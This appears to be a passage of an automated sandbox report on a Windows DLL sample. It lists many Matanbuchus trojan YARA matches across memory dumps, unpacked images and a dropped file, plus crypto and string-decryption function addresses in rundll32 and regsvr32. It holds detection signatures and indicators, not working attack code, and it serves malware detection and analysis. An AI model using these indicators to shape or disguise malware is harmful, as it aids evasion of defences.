Source: 0000000E.00000002.3112462220.0000000004BA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 0000000E.00000002.3112462220.0000000004BA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 0000000E.00000002.3113053269.000000006D051000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 00000012.00000002.3113049716.000000006D051000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 00000012.00000002.3114291162.000000007ED40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 00000012.00000002.3114291162.000000007ED40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: C:\Users\user\8f08\user-PC\user-PC.ocx, type: DROPPED	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown

Detected potential crypto function

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3A9EF0	14_2_7F3A9EF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3AFA00	14_2_7F3AFA00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3728BF	14_2_7F3728BF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3B4560	14_2_7F3B4560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F35B5AE	14_2_7F35B5AE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F36DF4E	14_2_7F36DF4E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3BFFE0	14_2_7F3BFFE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F39AFC0	14_2_7F39AFC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F35ED38	14_2_7F35ED38
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F36ED68	14_2_7F36ED68
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F36CD55	14_2_7F36CD55
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F36CDD8	14_2_7F36CDD8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3DDDCB	14_2_7F3DDDCB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F36CC31	14_2_7F36CC31
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F35DC1C	14_2_7F35DC1C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F39CC60	14_2_7F39CC60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F365C4E	14_2_7F365C4E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F372CBF	14_2_7F372CBF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F372A3F	14_2_7F372A3F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F364A3B	14_2_7F364A3B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F36DA03	14_2_7F36DA03
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F35DA02	14_2_7F35DA02
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3DDA66	14_2_7F3DDA66
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3E1ABD	14_2_7F3E1ABD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3ECAEF	14_2_7F3ECAEF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F36693B	14_2_7F36693B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3D8940	14_2_7F3D8940
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3D699D	14_2_7F3D699D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F373992	14_2_7F373992
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F35A9E3	14_2_7F35A9E3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F36A8E8	14_2_7F36A8E8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3678CD	14_2_7F3678CD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F368670	14_2_7F368670
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F35A696	14_2_7F35A696
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3DD6D8	14_2_7F3DD6D8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F397510	14_2_7F397510
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F35A430	14_2_7F35A430
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F36C426	14_2_7F36C426
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F36C44C	14_2_7F36C44C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F36C448	14_2_7F36C448
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3594FF	14_2_7F3594FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F36B32B	14_2_7F36B32B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3E53AC	14_2_7F3E53AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3D2390	14_2_7F3D2390
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F36C27E	14_2_7F36C27E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F364128	14_2_7F364128
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F39F190	14_2_7F39F190
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3A8180	14_2_7F3A8180
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDB9EF0	18_2_7EDB9EF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDBFA00	18_2_7EDBFA00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED83972	18_2_7ED83972
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED6B5AE	18_2_7ED6B5AE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDC4560	18_2_7EDC4560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED9AE30	18_2_7ED9AE30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDAAFC0	18_2_7EDAAFC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDCFFE0	18_2_7EDCFFE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED7DF4E	18_2_7ED7DF4E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED75C4E	18_2_7ED75C4E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDACC60	18_2_7EDACC60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED7CC31	18_2_7ED7CC31
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED7CDD8	18_2_7ED7CDD8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDEDDCB	18_2_7EDEDDCB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED7CD55	18_2_7ED7CD55
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED7ED68	18_2_7ED7ED68
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED6ED38	18_2_7ED6ED38
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDFCAEF	18_2_7EDFCAEF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDF1ABD	18_2_7EDF1ABD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDEDA66	18_2_7EDEDA66
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED9EA10	18_2_7ED9EA10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED6DA02	18_2_7ED6DA02
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED7DA03	18_2_7ED7DA03
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED74A3B	18_2_7ED74A3B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDA0B80	18_2_7EDA0B80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED778CD	18_2_7ED778CD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED7A8E8	18_2_7ED7A8E8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED6A9E3	18_2_7ED6A9E3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDE699D	18_2_7EDE699D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDE8940	18_2_7EDE8940
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED7693B	18_2_7ED7693B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDED6D8	18_2_7EDED6D8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED6A696	18_2_7ED6A696
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED78670	18_2_7ED78670
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED9C790	18_2_7ED9C790
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDCC7B0	18_2_7EDCC7B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED994D0	18_2_7ED994D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED824EC	18_2_7ED824EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED824E2	18_2_7ED824E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED7C44C	18_2_7ED7C44C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED7C448	18_2_7ED7C448
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED6A430	18_2_7ED6A430
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED7C426	18_2_7ED7C426
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDB1540	18_2_7EDB1540
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDA7510	18_2_7EDA7510
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDB5520	18_2_7EDB5520
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDB32D0	18_2_7EDB32D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED7C27E	18_2_7ED7C27E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDE2390	18_2_7EDE2390
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDF53AC	18_2_7EDF53AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED7B32B	18_2_7ED7B32B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDAF190	18_2_7EDAF190
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDB8180	18_2_7EDB8180
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED74128	18_2_7ED74128
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEB9EF0	34_2_7EEB9EF0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEBFA00	34_2_7EEBFA00
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE828BF	34_2_7EE828BF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE6B5AE	34_2_7EE6B5AE
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEC4560	34_2_7EEC4560
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EECFFE0	34_2_7EECFFE0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEAAFC0	34_2_7EEAAFC0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE7DF4E	34_2_7EE7DF4E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE82CBF	34_2_7EE82CBF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEACC60	34_2_7EEACC60
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE75C4E	34_2_7EE75C4E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE7CC31	34_2_7EE7CC31
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE6DC1C	34_2_7EE6DC1C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEEDDCB	34_2_7EEEDDCB
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE7CDD8	34_2_7EE7CDD8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE7ED68	34_2_7EE7ED68
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE7CD55	34_2_7EE7CD55
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE6ED38	34_2_7EE6ED38
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEFCAEF	34_2_7EEFCAEF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEF1ABD	34_2_7EEF1ABD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEEDA66	34_2_7EEEDA66
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE82A3F	34_2_7EE82A3F
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE74A3B	34_2_7EE74A3B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE6DA02	34_2_7EE6DA02
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE7DA03	34_2_7EE7DA03
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE7A8E8	34_2_7EE7A8E8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE778CD	34_2_7EE778CD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE6A9E3	34_2_7EE6A9E3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEE699D	34_2_7EEE699D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE83992	34_2_7EE83992
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEE8940	34_2_7EEE8940
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE7693B	34_2_7EE7693B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEED6D8	34_2_7EEED6D8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE6A696	34_2_7EE6A696
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE78670	34_2_7EE78670
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE694FF	34_2_7EE694FF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE7C44C	34_2_7EE7C44C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE7C448	34_2_7EE7C448
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE7C426	34_2_7EE7C426
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE6A430	34_2_7EE6A430
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEA7510	34_2_7EEA7510
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE7C27E	34_2_7EE7C27E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEF53AC	34_2_7EEF53AC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEE2390	34_2_7EEE2390
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE7B32B	34_2_7EE7B32B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEB8180	34_2_7EEB8180
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEAF190	34_2_7EEAF190
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE74128	34_2_7EE74128

Found potential string decryption / allocating functions

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 7EDE1850 appears 33 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 7EDEF80D appears 128 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 7F3DF80D appears 128 times
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: String function: 7EEEF80D appears 128 times

One or more processes crash

Source: C:\Windows\SysWOW64\rundll32.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7588 -s 608

Source: file.dll

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE, DLL

Yara signature match

Source: file.dll, type: SAMPLE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: sslproxydump.pcap, type: PCAP	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 34.2.regsvr32.exe.6b810000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 14.2.rundll32.exe.6d050000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 14.2.rundll32.exe.4910000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 18.2.rundll32.exe.6d050000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 22.2.rundll32.exe.6d050000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 14.2.rundll32.exe.4910000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 34.2.regsvr32.exe.7ee40000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 34.2.regsvr32.exe.7ee40000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 14.2.rundll32.exe.7f330000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 14.2.rundll32.exe.7f330000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 14.2.rundll32.exe.7f330000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 14.2.rundll32.exe.7f330000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 34.2.regsvr32.exe.7ee40000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 34.2.regsvr32.exe.7ee40000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 18.2.rundll32.exe.7ed40000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 18.2.rundll32.exe.7ed40000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 18.2.rundll32.exe.7ed40000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 18.2.rundll32.exe.7ed40000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
